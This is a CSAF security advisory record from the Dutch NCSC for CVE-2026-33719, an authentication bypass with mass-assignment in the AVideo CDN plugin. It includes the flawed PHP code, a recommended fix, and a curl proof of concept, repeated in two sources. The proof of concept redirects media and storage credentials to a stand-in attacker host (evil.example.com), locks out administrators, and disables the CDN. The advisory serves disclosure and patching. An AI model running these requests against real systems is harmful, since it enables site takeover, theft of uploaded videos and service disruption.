{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33719",
        "tracking": {
            "current_release_date": "2026-03-26T00:50:25.597415Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33719",
            "initial_release_date": "2026-03-24T13:52:44.570374Z",
            "revision_history": [
                {
                    "date": "2026-03-24T13:52:44.570374Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-24T13:52:55.323036Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-24T14:25:31.611172Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-24T14:25:38.567824Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T21:37:16.212328Z",
                    "number": "5",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-24T21:37:34.795444Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T15:27:06.419015Z",
                    "number": "7",
                    "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-25T15:27:08.196260Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T15:39:27.921829Z",
                    "number": "9",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-25T23:16:45.242864Z",
                    "number": "10",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-25T23:16:46.913491Z",
                    "number": "11",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-26T00:50:21.246312Z",
                    "number": "12",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (18).| Product Identifiers created (17).| References created (3).| CWES updated (1)."
                }
            ],
            "status": "interim",
            "version": "12"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<=26.0",
                                "product": {
                                    "name": "vers:unknown/<=26.0",
                                    "product_id": "CSAFPID-5893889",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "AVideo"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/10.4",
                                "product": {
                                    "name": "vers:unknown/10.4",
                                    "product_id": "CSAFPID-5656122",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@10.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/10.8",
                                "product": {
                                    "name": "vers:unknown/10.8",
                                    "product_id": "CSAFPID-5656123",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@10.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11",
                                "product": {
                                    "name": "vers:unknown/11",
                                    "product_id": "CSAFPID-5656124",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.1",
                                "product": {
                                    "name": "vers:unknown/11.1",
                                    "product_id": "CSAFPID-5656125",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.1.1",
                                "product": {
                                    "name": "vers:unknown/11.1.1",
                                    "product_id": "CSAFPID-5656126",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.1.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.5",
                                "product": {
                                    "name": "vers:unknown/11.5",
                                    "product_id": "CSAFPID-5656127",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.6",
                                "product": {
                                    "name": "vers:unknown/11.6",
                                    "product_id": "CSAFPID-5656128",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/12.4",
                                "product": {
                                    "name": "vers:unknown/12.4",
                                    "product_id": "CSAFPID-5656129",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@12.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.3",
                                "product": {
                                    "name": "vers:unknown/14.3",
                                    "product_id": "CSAFPID-5656130",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.3.1",
                                "product": {
                                    "name": "vers:unknown/14.3.1",
                                    "product_id": "CSAFPID-5656131",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.3.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.4",
                                "product": {
                                    "name": "vers:unknown/14.4",
                                    "product_id": "CSAFPID-5656132",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/18.0",
                                "product": {
                                    "name": "vers:unknown/18.0",
                                    "product_id": "CSAFPID-5656133",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@18.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/21.0",
                                "product": {
                                    "name": "vers:unknown/21.0",
                                    "product_id": "CSAFPID-5721197",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@21.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/22.0",
                                "product": {
                                    "name": "vers:unknown/22.0",
                                    "product_id": "CSAFPID-5772271",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@22.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/24.0",
                                "product": {
                                    "name": "vers:unknown/24.0",
                                    "product_id": "CSAFPID-5772272",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@24.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/25.0",
                                "product": {
                                    "name": "vers:unknown/25.0",
                                    "product_id": "CSAFPID-5840723",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@25.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/26.0",
                                "product": {
                                    "name": "vers:unknown/26.0",
                                    "product_id": "CSAFPID-5878928",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@26.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<=26.0",
                                "product": {
                                    "name": "vers:unknown/>=0|<=26.0",
                                    "product_id": "CSAFPID-5878929"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "avideo"
                    }
                ],
                "category": "vendor",
                "name": "WWBN"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33719",
            "cwe": {
                "id": "CWE-306",
                "name": "Missing Authentication for Critical Function"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the CDN plugin endpoints `plugin/CDN/status.json.php` and `plugin/CDN/disable.json.php` use key-based authentication with an empty string default key. When the CDN plugin is enabled but the key has not been configured (the default state), the key validation check is completely bypassed, allowing any unauthenticated attacker to modify the full CDN configuration — including CDN URLs, storage credentials, and the authentication key itself — via mass-assignment through the `par` request parameter. Commit adeff0a31ba04a56f411eef256139fd7ed7d4310 contains a patch.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33719"
                },
                {
                    "category": "description",
                    "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the CDN plugin endpoints `plugin/CDN/status.json.php` and `plugin/CDN/disable.json.php` use key-based authentication with an empty string default key. When the CDN plugin is enabled but the key has not been configured (the default state), the key validation check is completely bypassed, allowing any unauthenticated attacker to modify the full CDN configuration — including CDN URLs, storage credentials, and the authentication key itself — via mass-assignment through the `par` request parameter. Commit adeff0a31ba04a56f411eef256139fd7ed7d4310 contains a patch.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33719.json"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nThe CDN plugin endpoints `plugin/CDN/status.json.php` and `plugin/CDN/disable.json.php` use key-based authentication with an empty string default key. When the CDN plugin is enabled but the key has not been configured (the default state), the key validation check is completely bypassed, allowing any unauthenticated attacker to modify the full CDN configuration — including CDN URLs, storage credentials, and the authentication key itself — via mass-assignment through the `par` request parameter.\n\n## Details\n\nThe CDN plugin defines a default empty key in `plugin/CDN/CDN.php:68`:\n\n```php\n$obj->key = \"\";\n```\n\nThe `status.json.php` endpoint authenticates requests using this key, but the check has a critical logic flaw at lines 16-27:\n\n```php\n// Line 16-19: Requires attacker to provide SOME key value\nif (empty($_REQUEST['key'])) {\n    $resp->msg = 'Key is empty';\n    die(json_encode($resp));\n}\n\n// Line 21-26: Only validates key IF stored key is non-empty\nif (!empty($obj->key)) {      // When key is \"\" (default), this is FALSE\n    //check the key\n    if ($obj->key !== $_REQUEST['key']) {\n        $resp->msg = 'Key Does not match';\n        die(json_encode($resp));\n    }\n}\n```\n\nWhen the stored key is the default empty string `\"\"`, `!empty(\"\")` evaluates to `false`, and the entire key comparison block is skipped. Any non-empty value provided by the attacker passes authentication.\n\nFollowing the bypass, lines 28-31 perform unchecked mass-assignment:\n\n```php\n$obj->key = $_REQUEST['key'];\nforeach ($_REQUEST['par'] as $key => $value) {\n    $obj->{$key} = $value;\n    $resp->{$key} = $value;\n}\n```\n\nThe attacker-controlled `par` array sets arbitrary properties on the plugin data object. At line 95, the modified object is persisted to the database:\n\n```php\n$cdn = AVideoPlugin::loadPluginIfEnabled('CDN');\n$id = $cdn->setDataObject($obj);\n```\n\n`setDataObject()` in `Plugin.abstract.php:263` serializes the entire object to JSON and saves it, making all mass-assigned properties persistent.\n\nExploitable properties (defined in `CDN.php:62-87`) include:\n- `CDN` — main CDN URL for serving all video content\n- `CDN_S3`, `CDN_B2`, `CDN_FTP` — storage-specific CDN URLs\n- `enable_storage` — enables CDN storage functionality\n- `storage_hostname`, `storage_username`, `storage_password` — storage backend credentials\n- `key` — the authentication key itself (via mass-assignment, can override line 28)\n\nThe `disable.json.php` endpoint has the identical authentication bypass (lines 16-27) and additionally deactivates the CDN plugin entirely (line 37: `$cdn->setStatus('inactive')`).\n\nThis contrasts with other sensitive endpoints in the codebase that properly use session-based authentication. For example, `Gallery/saveSort.json.php` (commit 087dab884) uses `isGlobalTokenValid()`, and commit daca4ffb1 added `User::isAdmin()` checks to other configuration endpoints.\n\n## PoC\n\n**Prerequisites:** AVideo instance with CDN plugin enabled and key not configured (default state after enabling the plugin).\n\n**Step 1: Verify CDN plugin is enabled and key is default**\n\n```bash\ncurl -s 'https://target/plugin/CDN/status.json.php' \\\n  -d 'key=anything' \\\n  -d 'par[CDN]=https://evil.example.com/'\n```\n\nIf the response contains `\"error\":false`, the key bypass worked and CDN URL has been overwritten.\n\n**Step 2: Full takeover — redirect media, enable storage with attacker credentials, lock out admins**\n\n```bash\ncurl -s 'https://target/plugin/CDN/status.json.php' \\\n  -d 'key=initial-bypass' \\\n  -d 'par[CDN]=https://evil.example.com/' \\\n  -d 'par[enable_storage]=1' \\\n  -d 'par[storage_hostname]=evil.example.com' \\\n  -d 'par[storage_username]=attacker' \\\n  -d 'par[storage_password]=controlled' \\\n  -d 'par[key]=attacker-secret-key'\n```\n\nThis single request:\n1. Redirects all CDN-served media URLs to attacker's server\n2. Enables CDN storage pointing to attacker-controlled host\n3. Sets the key to `attacker-secret-key`, locking legitimate administrators out of reconfiguring via this endpoint\n\n**Step 3: Disable CDN entirely (denial of service)**\n\n```bash\ncurl -s 'https://target/plugin/CDN/disable.json.php' \\\n  -d 'key=attacker-secret-key' \\\n  -d 'par[x]=1'\n```\n\nThis deactivates the CDN plugin, disrupting media delivery.\n\n## Impact\n\nAn unauthenticated remote attacker can:\n\n1. **Redirect all media delivery** — By overwriting the CDN URL, all video content served to users is fetched from an attacker-controlled server, enabling content injection or phishing.\n2. **Exfiltrate uploaded videos** — By enabling storage with attacker-controlled credentials, newly uploaded videos are sent to the attacker's storage server.\n3. **Overwrite storage credentials** — The `storage_hostname`, `storage_username`, and `storage_password` fields are all mass-assignable, allowing the attacker to hijack the storage backend.\n4. **Lock out administrators** — By setting the `key` via mass-assignment, the attacker prevents legitimate administrators from using these endpoints to restore configuration (though admin panel access is unaffected).\n5. **Disable CDN** — Via `disable.json.php`, the attacker can deactivate the CDN plugin entirely, causing service disruption for media delivery.\n\nThe vulnerability is exploitable on any AVideo instance where the CDN plugin has been enabled but the key has not been manually configured — which is the default state immediately after enabling the plugin.\n\n## Recommended Fix\n\nAdd proper session-based authentication to both endpoints and remove the flawed key-only auth as the sole gate. In `plugin/CDN/status.json.php` and `plugin/CDN/disable.json.php`, add an admin check after the configuration include:\n\n```php\nrequire_once dirname(__FILE__) . '/../../videos/configuration.php';\n_session_write_close();\nheader('Content-Type: application/json');\n\n$resp = new stdClass();\n$resp->error = true;\n$resp->msg = '';\n\n// Fix: Require admin authentication\nif (!User::isAdmin()) {\n    $obj = AVideoPlugin::getDataObjectIfEnabled('CDN');\n    if (empty($obj) || empty($obj->key) || empty($_REQUEST['key']) || $obj->key !== $_REQUEST['key']) {\n        $resp->msg = 'Authentication required';\n        die(json_encode($resp));\n    }\n}\n```\n\nAdditionally, restrict mass-assignment to only known, safe properties by validating against a whitelist:\n\n```php\n$allowedParams = ['CDN', 'CDN_S3', 'CDN_B2', 'CDN_FTP', 'CDN_Live'];\nforeach ($_REQUEST['par'] as $key => $value) {\n    if (!in_array($key, $allowedParams, true)) {\n        continue;\n    }\n    $obj->{$key} = $value;\n    $resp->{$key} = $value;\n}\n```\n\nThis prevents mass-assignment of sensitive properties like `key`, `storage_password`, `storage_hostname`, and `enable_storage` even when the key-based auth is legitimately used by CDN nodes.",
                    "title": "github - https://api.github.com/advisories/GHSA-r64r-883r-wcwh"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nThe CDN plugin endpoints `plugin/CDN/status.json.php` and `plugin/CDN/disable.json.php` use key-based authentication with an empty string default key. When the CDN plugin is enabled but the key has not been configured (the default state), the key validation check is completely bypassed, allowing any unauthenticated attacker to modify the full CDN configuration — including CDN URLs, storage credentials, and the authentication key itself — via mass-assignment through the `par` request parameter.\n\n## Details\n\nThe CDN plugin defines a default empty key in `plugin/CDN/CDN.php:68`:\n\n```php\n$obj->key = \"\";\n```\n\nThe `status.json.php` endpoint authenticates requests using this key, but the check has a critical logic flaw at lines 16-27:\n\n```php\n// Line 16-19: Requires attacker to provide SOME key value\nif (empty($_REQUEST['key'])) {\n    $resp->msg = 'Key is empty';\n    die(json_encode($resp));\n}\n\n// Line 21-26: Only validates key IF stored key is non-empty\nif (!empty($obj->key)) {      // When key is \"\" (default), this is FALSE\n    //check the key\n    if ($obj->key !== $_REQUEST['key']) {\n        $resp->msg = 'Key Does not match';\n        die(json_encode($resp));\n    }\n}\n```\n\nWhen the stored key is the default empty string `\"\"`, `!empty(\"\")` evaluates to `false`, and the entire key comparison block is skipped. Any non-empty value provided by the attacker passes authentication.\n\nFollowing the bypass, lines 28-31 perform unchecked mass-assignment:\n\n```php\n$obj->key = $_REQUEST['key'];\nforeach ($_REQUEST['par'] as $key => $value) {\n    $obj->{$key} = $value;\n    $resp->{$key} = $value;\n}\n```\n\nThe attacker-controlled `par` array sets arbitrary properties on the plugin data object. At line 95, the modified object is persisted to the database:\n\n```php\n$cdn = AVideoPlugin::loadPluginIfEnabled('CDN');\n$id = $cdn->setDataObject($obj);\n```\n\n`setDataObject()` in `Plugin.abstract.php:263` serializes the entire object to JSON and saves it, making all mass-assigned properties persistent.\n\nExploitable properties (defined in `CDN.php:62-87`) include:\n- `CDN` — main CDN URL for serving all video content\n- `CDN_S3`, `CDN_B2`, `CDN_FTP` — storage-specific CDN URLs\n- `enable_storage` — enables CDN storage functionality\n- `storage_hostname`, `storage_username`, `storage_password` — storage backend credentials\n- `key` — the authentication key itself (via mass-assignment, can override line 28)\n\nThe `disable.json.php` endpoint has the identical authentication bypass (lines 16-27) and additionally deactivates the CDN plugin entirely (line 37: `$cdn->setStatus('inactive')`).\n\nThis contrasts with other sensitive endpoints in the codebase that properly use session-based authentication. For example, `Gallery/saveSort.json.php` (commit 087dab884) uses `isGlobalTokenValid()`, and commit daca4ffb1 added `User::isAdmin()` checks to other configuration endpoints.\n\n## PoC\n\n**Prerequisites:** AVideo instance with CDN plugin enabled and key not configured (default state after enabling the plugin).\n\n**Step 1: Verify CDN plugin is enabled and key is default**\n\n```bash\ncurl -s 'https://target/plugin/CDN/status.json.php' \\\n  -d 'key=anything' \\\n  -d 'par[CDN]=https://evil.example.com/'\n```\n\nIf the response contains `\"error\":false`, the key bypass worked and CDN URL has been overwritten.\n\n**Step 2: Full takeover — redirect media, enable storage with attacker credentials, lock out admins**\n\n```bash\ncurl -s 'https://target/plugin/CDN/status.json.php' \\\n  -d 'key=initial-bypass' \\\n  -d 'par[CDN]=https://evil.example.com/' \\\n  -d 'par[enable_storage]=1' \\\n  -d 'par[storage_hostname]=evil.example.com' \\\n  -d 'par[storage_username]=attacker' \\\n  -d 'par[storage_password]=controlled' \\\n  -d 'par[key]=attacker-secret-key'\n```\n\nThis single request:\n1. Redirects all CDN-served media URLs to attacker's server\n2. Enables CDN storage pointing to attacker-controlled host\n3. Sets the key to `attacker-secret-key`, locking legitimate administrators out of reconfiguring via this endpoint\n\n**Step 3: Disable CDN entirely (denial of service)**\n\n```bash\ncurl -s 'https://target/plugin/CDN/disable.json.php' \\\n  -d 'key=attacker-secret-key' \\\n  -d 'par[x]=1'\n```\n\nThis deactivates the CDN plugin, disrupting media delivery.\n\n## Impact\n\nAn unauthenticated remote attacker can:\n\n1. **Redirect all media delivery** — By overwriting the CDN URL, all video content served to users is fetched from an attacker-controlled server, enabling content injection or phishing.\n2. **Exfiltrate uploaded videos** — By enabling storage with attacker-controlled credentials, newly uploaded videos are sent to the attacker's storage server.\n3. **Overwrite storage credentials** — The `storage_hostname`, `storage_username`, and `storage_password` fields are all mass-assignable, allowing the attacker to hijack the storage backend.\n4. **Lock out administrators** — By setting the `key` via mass-assignment, the attacker prevents legitimate administrators from using these endpoints to restore configuration (though admin panel access is unaffected).\n5. **Disable CDN** — Via `disable.json.php`, the attacker can deactivate the CDN plugin entirely, causing service disruption for media delivery.\n\nThe vulnerability is exploitable on any AVideo instance where the CDN plugin has been enabled but the key has not been manually configured — which is the default state immediately after enabling the plugin.\n\n## Recommended Fix\n\nAdd proper session-based authentication to both endpoints and remove the flawed key-only auth as the sole gate. In `plugin/CDN/status.json.php` and `plugin/CDN/disable.json.php`, add an admin check after the configuration include:\n\n```php\nrequire_once dirname(__FILE__) . '/../../videos/configuration.php';\n_session_write_close();\nheader('Content-Type: application/json');\n\n$resp = new stdClass();\n$resp->error = true;\n$resp->msg = '';\n\n// Fix: Require admin authentication\nif (!User::isAdmin()) {\n    $obj = AVideoPlugin::getDataObjectIfEnabled('CDN');\n    if (empty($obj) || empty($obj->key) || empty($_REQUEST['key']) || $obj->key !== $_REQUEST['key']) {\n        $resp->msg = 'Authentication required';\n        die(json_encode($resp));\n    }\n}\n```\n\nAdditionally, restrict mass-assignment to only known, safe properties by validating against a whitelist:\n\n```php\n$allowedParams = ['CDN', 'CDN_S3', 'CDN_B2', 'CDN_FTP', 'CDN_Live'];\nforeach ($_REQUEST['par'] as $key => $value) {\n    if (!in_array($key, $allowedParams, true)) {\n        continue;\n    }\n    $obj->{$key} = $value;\n    $resp->{$key} = $value;\n}\n```\n\nThis prevents mass-assignment of sensitive properties like `key`, `storage_password`, `storage_hostname`, and `enable_storage` even when the key-based auth is legitimately used by CDN nodes.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-r64r-883r-wcwh.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00123",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "3.5",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "Is related to (a version of) an uncommon product, There is exploit data available from source Nvd",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5893889",
                    "CSAFPID-5656122",
                    "CSAFPID-5656123",
                    "CSAFPID-5656124",
                    "CSAFPID-5656125",
                    "CSAFPID-5656126",
                    "CSAFPID-5656127",
                    "CSAFPID-5656128",
                    "CSAFPID-5656129",
                    "CSAFPID-5656130",
                    "CSAFPID-5656131",
                    "CSAFPID-5656132",
                    "CSAFPID-5656133",
                    "CSAFPID-5721197",
                    "CSAFPID-5772271",
                    "CSAFPID-5772272",
                    "CSAFPID-5840723",
                    "CSAFPID-5878928",
                    "CSAFPID-5878929"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33719"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33719.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-r64r-883r-wcwh"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-r64r-883r-wcwh.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/WWBN/AVideo/commit/adeff0a31ba04a56f411eef256139fd7ed7d4310"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-r64r-883r-wcwh"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33719"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-r64r-883r-wcwh"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L",
                        "baseScore": 8.6,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-5656122",
                        "CSAFPID-5656123",
                        "CSAFPID-5656124",
                        "CSAFPID-5656125",
                        "CSAFPID-5656126",
                        "CSAFPID-5656127",
                        "CSAFPID-5656128",
                        "CSAFPID-5656129",
                        "CSAFPID-5656130",
                        "CSAFPID-5656131",
                        "CSAFPID-5656132",
                        "CSAFPID-5656133",
                        "CSAFPID-5721197",
                        "CSAFPID-5772271",
                        "CSAFPID-5772272",
                        "CSAFPID-5840723",
                        "CSAFPID-5878928",
                        "CSAFPID-5878929",
                        "CSAFPID-5893889"
                    ]
                }
            ],
            "title": "CVE-2026-33719"
        }
    ]
}